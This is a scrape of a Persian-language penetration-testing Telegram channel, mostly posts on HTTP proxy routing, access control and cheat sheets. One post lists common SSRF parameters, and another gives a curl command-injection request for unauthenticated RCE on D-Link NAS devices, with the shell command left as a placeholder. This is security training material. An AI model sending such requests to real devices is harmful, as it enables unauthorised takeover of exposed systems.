Try Hack Box
4.88K subscribers
572 photos
63 videos
79 files
601 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @Unique_exploitBot
ADS (Tablighat ) :
@THBADS
Download Telegram
🎯 محل قرار گیری proxy ها در شبکه (B)
🔹 Access (Ingress) Proxy
این پراکسی‌ها در سمت ورودی شبکه قرار می‌گیرند، مثل داخل شرکت‌های ISP.
کاربردهاشون:

* کش‌کردن صفحات پرطرفدار برای افزایش سرعت دانلود 🚀
* کاهش مصرف پهنای باند اینترنت کاربران
* مناسب برای مکان‌هایی که اینترنت گرونه یا محدود دارن (مثلاً خوابگاه یا شرکت‌های بزرگ)

🔹 Surrogate / Reverse Proxy
این‌ها همون Reverse Proxy هستن که معمولاً جلوی وب‌سرورها قرار می‌گیرن.
کاربردها:

* افزایش امنیت سرورهای واقعی
* کش‌کردن محتوا از سمت سرور برای کاهش بار
* پنهان‌کردن IP واقعی سرور
* معمولاً کاربر فقط آدرس همین پراکسی رو می‌بینه، نه آدرس واقعی سرور 🎭

🔹 Network Exchange Proxy
این نوع پراکسی‌ها در نقاط تبادل اینترنت (Internet Exchange) استفاده می‌شن.
کاربرد:

* مدیریت ازدحام اینترنتی در مسیرهای پرترافیک
* صرفه‌جویی در پهنای باند در مناطقی مثل اروپا یا کشورهایی با هزینه بالا

🔹 Proxy Hierarchies (سلسله‌مراتب پراکسی)
گاهی پراکسی‌ها به صورت زنجیره‌ای و چندلایه‌ای تنظیم می‌شن.
مثلاً:
Client → Proxy 1 (فرزند) → Proxy 2 (والد) → اینترنت یا وب‌سرور
📦 این ساختار باعث می‌شه درخواست‌ها به‌صورت هوشمند بین چند پراکسی جابه‌جا بشن، تا سریع‌ترین یا بهینه‌ترین پاسخ ارائه بشه.

🧭 Content Routing در ساختار سلسله‌مراتبی
بر اساس نوع درخواست یا مقصد، پراکسی می‌تونه مسیرش رو عوض کنه. مثلاً:

* اگر محتوایی قبلاً کش شده باشه، مستقیماً تحویل داده می‌شه
* اگر نه، پراکسی بعدی یا سرور اصلی اون رو Fetch می‌کنه
* حتی ممکنه تصاویر رو فشرده کنه تا سریع‌تر بارگذاری بشه (ویژه موبایل یا مودم‌های ضعیف) 📉📷

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity
👍62
HTTP Status Code Cheatsheet.pdf
807.2 KB
✏️ مقاله تالیف شده
HTTP Status Code Cheatsheet (in cybersecurity terms)


✍️نویسنده
@TryHackBox | The Chaos

#HTTP #CheatSheet #CyberSecurity
👍7
۲۵ پارامتر رایج SSRF 📃

-?dest={target} 
-?redirect={target} 
-?uri={target} 
-?path={target} 
-?continue={target} 
-?url={target} 
-?window={target} 
-?next={target} 
-?data={target} 
-?reference={target} 
-?site={target} 
-?html={target} 
-?val={target} 
-?validate={target} 
-?domain={target} 
-?callback={target} 
-?return={target} 
-?page={target} 
-?feed={target} 
-?host={target} 
-?port={target} 
-?to={target} 
-?out={target} 
-?view={target} 
-?dir={target}

@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
6
🥷 تزریق فرمان در پارامتر NAME برای D-Link NAS

اجرای کد از راه دور (RCE) بدون تخصیص در چهار دستگاه مختلف ذخیره‌سازی داده‌های شبکه، که بیش از ۶۰٬۰۰۰ عدد از آن‌ها از طریق اینترنت در دسترس هستند.

یک باگ بسیار ساده که می‌توان با فازبندی ساده پیدا کرد:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"

#pentest #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
🔥5
🔐 آموزش تخصصی هک و امنیت سایبری
🎓 دوره‌های عملی، تحلیل‌ عمیق و محتوای حرفه‌ای در حوزه IT و امنیت اطلاعات
🚀 مناسب علاقه‌مندان، متخصصان و آینده‌سازان حوزه سایبری

📍‌ همراه ما باشید در:
🔗 @sajjadteymouri
🔥2
What is Attribute-Based Access Control (ABAC).pdf
603 KB
💢 کنترل دسترسی مبتنی بر ویژگی (ABAC) چیست؟

هر سازمانی به کنترل‌های دسترسی وابسته است تا داده‌های حساس را محافظت کند، سیاست‌های امنیتی را اجرا نماید و اطمینان حاصل کند که کارمندان سطح مناسبی از دسترسی به سیستم‌ها و برنامه‌ها دارند. به‌طور ساختار یافته، کنترل دسترسی مبتنی بر نقش (RBAC) مدل اصلی بوده است که مجوزها را بر اساس نقش‌های از پیش تعریف‌شده تخصیص می‌دهد. اگرچه این مدل در بسیاری از سناریوها مؤثر است، اما RBAC در محیط‌های پویا که کاربران، دستگاه‌ها و زمینه‌های داده به‌طور مداوم در حال تغییر هستند، محدودیت‌هایی دارد.

@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
13👌3👍1
All Bug Bounty Platforms List TryHackBox .pdf
847 KB
🗞 لیست جامع از همه پلتفرم‌های باگ‌بانتی
#باگ_بانتی #BugBounty
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
👍101
🚀 آموزش Proxies (پارت 5)
🌐 مبانی مسیریابی پروکسی در HTTP (بخش A)

در دنیای پراکسی‌ها (Proxies)، مسیریابی درخواست‌ها یکی از مهم‌ترین عملکردها برای بهبود عملکرد، مقیاس‌پذیری و امنیت است. بیایید با ۳ نوع متداول مسیریابی توسط (Child Proxies) آشنا شویم:

🌀 1. توزیع بار (Load Balancing)
پراکسی فرزند می‌تواند پراکسی والد (Parent Proxy) را بر اساس وضعیت بار فعلی انتخاب کند.
هدف: جلوگیری از فشار زیاد روی یک مسیر
🔁 با پخش ترافیک، عملکرد شبکه بهینه می‌شود.

📍 2. مسیریابی بر اساس موقعیت جغرافیایی
در این روش، پراکسی فرزند والدینی را انتخاب می‌کند که به سرور مبدأ نزدیک‌تر هستند.
هدف: کاهش تأخیر (Latency) و بهبود تجربه کاربر
🌍 مثال: درخواست کاربر ایرانی به والد نزدیک به خاورمیانه ارسال می‌شود.

📦 3. مسیریابی بر اساس نوع درخواست یا پروتکل
پراکسی ممکن است بسته به نوع پروتکل یا مسیر URI، درخواست را به والد خاصی ارسال کند.
🔗 مثلا درخواست‌های REST به یک والد، و SOAP به والد دیگر ارسال شود.
هدف: تخصصی‌سازی مسیر و افزایش بهره‌وری

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity
👍4🤔1
🌐 مبانی مسیریابی پروکسی در HTTP (بخش B)
در این قسمت دو محور را بررسی می‌کنیم:
1️⃣ روش Subscription-Based Routing
2️⃣ روش‌های چهارگانه انتقال ترافیک کلاینت به پراکسی‌ها (How Proxies Get Traffic)

روش Subscription-Based Routing چیست؟

در برخی زیرساخت‌ها، ارائه‌دهندگان محتوا (مثل CDNها یا شرکت‌های تبلیغاتی) برای داشتن کیفیت بهتر سرویس و سرعت بالاتر دسترسی، به ارائه‌دهنده پراکسی مبلغ بیشتری پرداخت می‌کنند.

ویژگی‌های این نوع مسیردهی:

* محتوا زودتر به کش منتقل می‌شود.
* داده‌ها فشرده‌تر و سریع‌تر ارائه می‌شوند.
* درخواست‌ها بر اساس زبان برنامه‌نویسی، افزونه یا منطق خاص به سرور یا پراکسی مناسب فرستاده می‌شوند.
* در محصولات مرورگر، افزونه، یا سیستم‌عامل، به شکل متفاوتی پیاده‌سازی می‌شود.

📌 هدف اصلی: افزایش سرعت بارگذاری و کاهش تاخیر در پاسخ‌دهی به کاربر نهایی



🛰 چگونه ترافیک کلاینت‌ها به پراکسی می‌رسد؟ (4 راه اصلی)

در مدل کلاسیک، مرورگرها مستقیم به سرور وب متصل می‌شوند. اما پراکسی‌ها این مسیر را تغییر می‌دهند. روش‌های زیر برای هدایت ترافیک کلاینت به پراکسی استفاده می‌شوند:


🔹 1. تغییر در کلاینت (Modify the Client)
🔧 با تنظیم دستی یا خودکار پراکسی در مرورگر (مثل Chrome یا Firefox):
• اگر کلاینت به‌درستی تنظیم شده باشد، همه‌ی درخواست‌های HTTP را مستقیماً به پراکسی ارسال می‌کند.
• این روش واضح، مستقیم و کنترل‌شده است.

📥 مثال: کاربر در تنظیمات مرورگر آدرس proxy.mycompany.local:3128 را وارد می‌کند.

🔹 2. تغییر در شبکه (Modify the Network)
🎯 به کمک تجهیزات شبکه مثل فایروال، سوییچ یا روتر:
پراکسی به‌صورت Interception یا Transparent اجرا می‌شود.
• کاربر حتی متوجه نمی‌شود که ترافیکش به پراکسی می‌رود.

📌 مثال: فایروال سازمان، تمام ترافیک پورت 80 را به پراکسی هدایت می‌کند.
📛 توجه: استفاده نادرست از این روش می‌تواند باعث نقض حریم خصوصی یا مشکلات امنیتی شود.

🔹 3. تغییر در نام‌گذاری دی ان اس (Modify the DNS Namespace)
🌍 با فریب DNS یا استفاده از رکوردهای DNS خاص (Surrogates):
• آدرس‌هایی که کاربران وارد می‌کنند، به جای سرور واقعی، به آدرس پراکسی اشاره می‌کنند.
• با DNS میشود IP مقصد را هنگام درخواست، دینامیک و طبق سیاست خاص محاسبه کند.

📥 مثال: کاربر example.com را باز می‌کند، ولی DNS، IP پراکسی را به او می‌دهد.

🔹 4. تغییر در وب‌سرور (Modify the Web Server)
🖥 وب‌سرور به کلاینت دستور استفاده از پراکسی را می‌دهد:
• با ارسال پاسخ HTTP 305 Use Proxy
• کلاینت در پاسخ به این دستور، از پراکسی تعیین‌شده استفاده می‌کند.

⚠️ این روش به دلایل امنیتی در اکثر مرورگرها دیگر پشتیبانی نمی‌شود.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Proxy #CyberSecurity
3
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox

🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial

🔶 داستان های هک
🆔 @TryHackBoxStory

🔶 آموزش برنامه نویسی
🆔 @TryCodeBox

🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod

🔶 کانال PFKSecurity از جمله پوشش APT , CVE , Exploit و موارد دیگر :

🆔 @PfkSecurity

👥 گروه های پرسش و پاسخ

🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup


🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox

🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
سرفصل مقاله
JSON Code Cheatsheet (in cybersecurity terms)

@TryHackBox
❤‍🔥5
JSON Cheatsheet.pdf
4.9 MB
✏️ مقاله تالیف شده
JSON Code Cheatsheet (in cybersecurity terms)


✍️نویسنده
@TryHackBox | The Chaos

#JSON #CheatSheet #CyberSecurity
❤‍🔥4
Social Engineering and AI.pdf
1.3 MB
هوش مصنوعی و مهندسی اجتماعی

هوش مصنوعی در حال پیشبرد نوآوری و دگرگونی تمام صنایع است از بهداشت و درمان تا خرده‌فروشی و تولید.هوش مصنوعی به کسب‌وکارها در سراسر جهان توانایی عملکرد با کارایی و پیچیدگی بیشتر را می‌دهد. به همین ترتیب،هوش مصنوعی به مجرمان سایبری نیز قدرت می‌بخشد.

تکنیک کلاسیک مهندسی اجتماعی شامل روش‌های فریبنده مانند جعل هویت یا دستکاری اعتماد برای استخراج اطلاعات شخصی و محرمانه از افراد تارگت است.با افزایش قدرت و دسترسی ابزارهای هوش مصنوعی، حملات مهندسی اجتماعی اکنون به طور قابل توجهی شخصی‌سازی شده‌تر، مؤثرتر و مقیاس‌پذیرتر شده‌اند. دفاع در برابر چنین حملاتی به ابزارهای پیچیده‌تری نسبت به گذشته نیاز دارد.

در این مقاله،بررسی خواهیم کرد که چگونه هوش مصنوعی مهندسی اجتماعی را به سطح جدیدی ارتقا داده است.به طور خاص، به این خواهیم پرداخت که چگونه فناوری‌های نوظهور مانند دیپ‌فیک‌ها، تکنیک‌های مهندسی اجتماعی را تقویت کرده و پتانسیل تقلب را افزایش داده‌اند. همچنین راهبردهای کاهش تهدید و ابزارهای موجود برای سازمان‌ها را برای مقابله مؤثر با این چالش بررسی خواهیم کرد.

#مهندسی_اجتماعی
#AI #SE
@TryHackBox
21
دوستان #سوال بهترین و بدترین تجربه‌تان با آکادمی‌ها که آموزش دیدید چه بوده؟


اگر مایل نبودید توی کامنت ها بنویسید میتوانید در اکانت پشیبانی جواب بدید
@THBxSupport
برگزاری جلسه ویس چت : مهندس سهیل هاشمی

با سلام خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص اهمیت ردتیم ( Red Team ) در سازمان ها به صورت ویس چت برگزار کنیم.

🎙️ مهمان ویژه: 
مهندس سهیل هاشمی – کارشناس Red Team

📅 زمان برگزاری: امشب
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 20:30

💬 سوالات خود را درباره Red Team در کامنت‌هاارسال کنید تا در جلسه به آن‌ها پرداخته شود.

🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .

@TryHackBox
👍6🔥4
Live stream started